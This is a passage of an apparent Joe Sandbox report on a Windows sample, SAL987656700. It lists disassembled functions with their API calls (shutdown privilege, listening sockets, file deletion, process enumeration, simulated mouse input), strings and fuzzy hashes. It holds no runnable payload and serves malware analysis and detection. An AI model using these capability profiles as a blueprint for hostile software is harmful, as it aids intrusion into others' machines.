                                        • Part of subcall function 008E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E173A
                                        • Part of subcall function 008E16C3: GetLastError.KERNEL32 ref: 008E174A
                                      • ExitWindowsEx.USER32(?,00000000), ref: 008EE932
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                      • String ID: $ $@$SeShutdownPrivilege
                                      • API String ID: 2234035333-3163812486
                                      • Opcode ID: 732711eb6f99e447d2ec0aab9e9e4e79d20bbb281f79ec81ec54b5fc715b42ba
                                      • Instruction ID: f054dae0e090a0fa15572ed0f993aa17d5b23b9a21798aba15667a8f39df4217
                                      • Opcode Fuzzy Hash: 732711eb6f99e447d2ec0aab9e9e4e79d20bbb281f79ec81ec54b5fc715b42ba
                                      • Instruction Fuzzy Hash: 530126B2B20255ABEB1476BA9C8AFFB769CF716744F144821F812E31D3E6B09C4481A0
                                      Function 00901204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • socket.WS2_32(00000002,00000001,00000006), ref: 00901276
                                      • WSAGetLastError.WS2_32 ref: 00901283
                                      • bind.WS2_32(00000000,?,00000010), ref: 009012BA
                                      • WSAGetLastError.WS2_32 ref: 009012C5
                                      • closesocket.WS2_32(00000000), ref: 009012F4
                                      • listen.WS2_32(00000000,00000005), ref: 00901303
                                      • WSAGetLastError.WS2_32 ref: 0090130D
                                      • closesocket.WS2_32(00000000), ref: 0090133C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                      • String ID:
                                      • API String ID: 540024437-0
                                      • Opcode ID: 85c8591a132f78b98ae16cceb365da1e4c7981cd2932c547de66c2456b44be9f
                                      • Instruction ID: 8d20a75e795c19abaac7af6163a37fd8281ec501a3170234f64359b78703b00c
                                      • Opcode Fuzzy Hash: 85c8591a132f78b98ae16cceb365da1e4c7981cd2932c547de66c2456b44be9f
                                      • Instruction Fuzzy Hash: 7E4160716001009FD710DF68D589B69BBE5BF86318F188198E8669F2D6C771ED81CBE1
                                      Function 008BB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 008BB9D4
                                      • _free.LIBCMT ref: 008BB9F8
                                      • _free.LIBCMT ref: 008BBB7F
                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00923700), ref: 008BBB91
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,0095121C,000000FF,00000000,0000003F,00000000,?,?), ref: 008BBC09
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00951270,000000FF,?,0000003F,00000000,?), ref: 008BBC36
                                      • _free.LIBCMT ref: 008BBD4B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                      • String ID:
                                      • API String ID: 314583886-0
                                      • Opcode ID: 63d144fcc7d679ce7c9b555f9dfec1470ecb62401d4d233c7c36c315017ef061
                                      • Instruction ID: 3417f9b72a1a8b716d5ea41d7e76864c0fa9d15e36a8d6867aedc9a46f0ad4e4
                                      • Opcode Fuzzy Hash: 63d144fcc7d679ce7c9b555f9dfec1470ecb62401d4d233c7c36c315017ef061
                                      • Instruction Fuzzy Hash: CFC11471A04209AFDB20DF699C51BEEBBE8FF45320F1841AAE494D7352EBB09E41C751
                                      Function 00918B02 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                        • Part of subcall function 0089912D: GetCursorPos.USER32(?), ref: 00899141
                                        • Part of subcall function 0089912D: ScreenToClient.USER32(00000000,?), ref: 0089915E
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000001), ref: 00899183
                                        • Part of subcall function 0089912D: GetAsyncKeyState.USER32(00000002), ref: 0089919D
                                      • ReleaseCapture.USER32 ref: 00918B77
                                      • SetWindowTextW.USER32(?,00000000), ref: 00918C12
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00918C25
                                      • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00918CFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 973565025-2107944366
                                      • Opcode ID: 3969a2fd3847c2ef7faaac5a8327a40f01ea6145669c956c9930b72c77a2540f
                                      • Instruction ID: cd113b800bc15caeea90aa96a8f263fc3d6989397457e5bcaf22660251136bc8
                                      • Opcode Fuzzy Hash: 3969a2fd3847c2ef7faaac5a8327a40f01ea6145669c956c9930b72c77a2540f
                                      • Instruction Fuzzy Hash: C8519970208304AFD714EF24DC56BAA77E4FB88755F00062DF996A72E1CB709944DBA2
                                      Function 008ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00883AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00883A97,?,?,00882E7F,?,?,?,00000000), ref: 00883AC2
                                        • Part of subcall function 008EE199: GetFileAttributesW.KERNEL32(?,008ECF95), ref: 008EE19A
                                      • FindFirstFileW.KERNEL32(?,?), ref: 008ED420
                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 008ED470
                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 008ED481
                                      • FindClose.KERNEL32(00000000), ref: 008ED498
                                      • FindClose.KERNEL32(00000000), ref: 008ED4A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                      • String ID: \*.*
                                      • API String ID: 2649000838-1173974218
                                      • Opcode ID: 04185e8951d5993d04f99af715b9d9219aaa61d3ba19e197e6674223157f20d8
                                      • Instruction ID: 825b39cb915b80163f80f1a4e10fe17f552184d9bbde39d044c9276ffcadbd20
                                      • Opcode Fuzzy Hash: 04185e8951d5993d04f99af715b9d9219aaa61d3ba19e197e6674223157f20d8
                                      • Instruction Fuzzy Hash: C4313C7101C3859BC215FF68D8918AFB7A8FEA6314F444A2DF4E1D2191EB30EA09D767
                                      Function 008BE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: c1c9f0bf885baea69cb69417e537cecb26468f1de3714a0f7ffabe954b1792cc
                                      • Instruction ID: 5673ceeac643cd62dcf347b7b14fd41087ba91241830006a15ea072f75a42674
                                      • Opcode Fuzzy Hash: c1c9f0bf885baea69cb69417e537cecb26468f1de3714a0f7ffabe954b1792cc
                                      • Instruction Fuzzy Hash: 3AC22771E086298FDB25CE289D407EAB7B5FB49305F1441EAD94DE7341E774AE818F40
                                      Function 008F648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 008F64DC
                                      • CoInitialize.OLE32(00000000), ref: 008F6639
                                      • CoCreateInstance.COMBASE(0091FCF8,00000000,00000001,0091FB68,?), ref: 008F6650
                                      • CoUninitialize.COMBASE ref: 008F68D4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: ae2bc6ee1add181c4efff1f078151c7246a9cf2cc0c44d19c4d7690cccc9cc9d
                                      • Instruction ID: dfbcee3c85fc893d195865354172743578ad73592f2f9f683397a9497a830a35
                                      • Opcode Fuzzy Hash: ae2bc6ee1add181c4efff1f078151c7246a9cf2cc0c44d19c4d7690cccc9cc9d
                                      • Instruction Fuzzy Hash: D4D15971508205AFD314EF28C881D6BB7E9FF98304F14496DF695DB291EB70E905CBA2
                                      Function 009022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 009022E8
                                        • Part of subcall function 008FE4EC: GetWindowRect.USER32(?,?), ref: 008FE504
                                      • GetDesktopWindow.USER32 ref: 00902312
                                      • GetWindowRect.USER32(00000000), ref: 00902319
                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00902355
                                      • GetCursorPos.USER32(?), ref: 00902381
                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009023DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                      • String ID:
                                      • API String ID: 2387181109-0
                                      • Opcode ID: b376302ef7750d12e7ffdf053e66f46af5b3fd72280a74e322fde57c60f0d254
                                      • Instruction ID: 378b4bef3b8b820247849918de78c8e22ec02889adc134c9d517f096f9d152a9
                                      • Opcode Fuzzy Hash: b376302ef7750d12e7ffdf053e66f46af5b3fd72280a74e322fde57c60f0d254
                                      • Instruction Fuzzy Hash: 1431DE72608315AFC720DF14C849B9BBBAAFF84710F004919F985D7191DB34EA08CB92
                                      Function 008F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 008F9B78
                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 008F9C8B
                                        • Part of subcall function 008F3874: GetInputState.USER32 ref: 008F38CB
                                        • Part of subcall function 008F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008F3966
                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 008F9BA8
                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 008F9C75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                      • String ID: *.*
                                      • API String ID: 1972594611-438819550
                                      • Opcode ID: d268aa5ec2d577b983aa636d69bd296c7e62c79177cd16f6ba8d3273a205de67
                                      • Instruction ID: 71301c7fba0154c18ed4506a49b01fd663ee3d4d439df8a5cf46d74a932c92e2
                                      • Opcode Fuzzy Hash: d268aa5ec2d577b983aa636d69bd296c7e62c79177cd16f6ba8d3273a205de67
                                      • Instruction Fuzzy Hash: D5414B7194420EABDF14EF68C885BEEBBB8FF05310F244056E955E2191EB309E84CF61
                                      Function 0089997D Relevance: 7.9, APIs: 5, Instructions: 375nativeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00899BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00899BB2
                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00899A4E
                                      • GetSysColor.USER32(0000000F), ref: 00899B23
                                      • SetBkColor.GDI32(?,00000000), ref: 00899B36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Color$DialogLongNtdllProc_Window
                                      • String ID:
                                      • API String ID: 1958858920-0
                                      • Opcode ID: 77bf090d52f2a88d2b74549b6cdb92ae5697bd6c0a865e2dbf42afcdb391c103
                                      • Instruction ID: 912af0bee888ea9bfc7087720217f05730e65921aa7fbdea5999536e7b990c89
                                      • Opcode Fuzzy Hash: 77bf090d52f2a88d2b74549b6cdb92ae5697bd6c0a865e2dbf42afcdb391c103
                                      • Instruction Fuzzy Hash: 8DA10970208528BFEF24BA2D9C59FBB27DDFB86314B18420EF542C6AD1DA259D41D372
                                      Function 00901806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0090304E: inet_addr.WS2_32(?), ref: 0090307A
                                        • Part of subcall function 0090304E: _wcslen.LIBCMT ref: 0090309B
                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0090185D
                                      • WSAGetLastError.WS2_32 ref: 00901884
                                      • bind.WS2_32(00000000,?,00000010), ref: 009018DB
                                      • WSAGetLastError.WS2_32 ref: 009018E6
                                      • closesocket.WS2_32(00000000), ref: 00901915
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                      • String ID:
                                      • API String ID: 1601658205-0
                                      • Opcode ID: c2f87da8ac7e595172ce80a5dfc1b4fae38a3e976c41068c5379b62c9f70c805
                                      • Instruction ID: d8b92d188c5fcab8f6a1ede6a50366ee316ca57c777a24db298f052a9bf7eef2
                                      • Opcode Fuzzy Hash: c2f87da8ac7e595172ce80a5dfc1b4fae38a3e976c41068c5379b62c9f70c805
                                      • Instruction Fuzzy Hash: E0518375A002109FEB10AF28D886F6A77E5EB44718F18C498FA159F3D3D771AD41CBA2
                                      Function 00911C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                      • String ID:
                                      • API String ID: 292994002-0
                                      • Opcode ID: d5a755681baaa400f3e0dcb83320825c8664e2897f89870b3e29e3e4ad50815d
                                      • Instruction ID: 7969e120423c8f270ecedb3b43bc1abc04180ad4294f23c285eec03b6ccc1559
                                      • Opcode Fuzzy Hash: d5a755681baaa400f3e0dcb83320825c8664e2897f89870b3e29e3e4ad50815d
                                      • Instruction Fuzzy Hash: E821B7717842156FE7209F1AD844B9A7BE9FF85354F198058E986CB391CB71EC82CBD0
                                      Function 00888060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                      • API String ID: 0-1546025612
                                      • Opcode ID: 2bc87d473b384b6abaf04faa34addcb2b503edfa11d93c17595da0e5d0023291
                                      • Instruction ID: fa58c12b16581bb4d026fc6366f07e4b0d3f2e15b41dabfdbb2d70ad76fe743b
                                      • Opcode Fuzzy Hash: 2bc87d473b384b6abaf04faa34addcb2b503edfa11d93c17595da0e5d0023291
                                      • Instruction Fuzzy Hash: DAA27C71A0061ACBDF24DF58C944BAEB7B1FF54314F6481AAE815E7285EB30ED91CB90
                                      Function 0090A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0090A6AC
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0090A6BA
                                        • Part of subcall function 00889CB3: _wcslen.LIBCMT ref: 00889CBD
                                      • Process32NextW.KERNEL32(00000000,?), ref: 0090A79C
                                      • CloseHandle.KERNEL32(00000000), ref: 0090A7AB
                                        • Part of subcall function 0089CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,008C3303,?), ref: 0089CE8A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2026164990.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                      • Associated: 00000000.00000002.2026144810.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000094C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026164990.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026418762.00000000009E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2026430792.00000000009E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_880000_SAL987656700.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                      • String ID:
                                      • API String ID: 1991900642-0
                                      • Opcode ID: b0a794f1feaf6d45e46c22db4e08718cd87d43734649e30ff08bc31c374b56cb
                                      • Instruction ID: 35fc65af19946de1e1c5003d599c30733794390bcc1af6bdecc32f1461264927
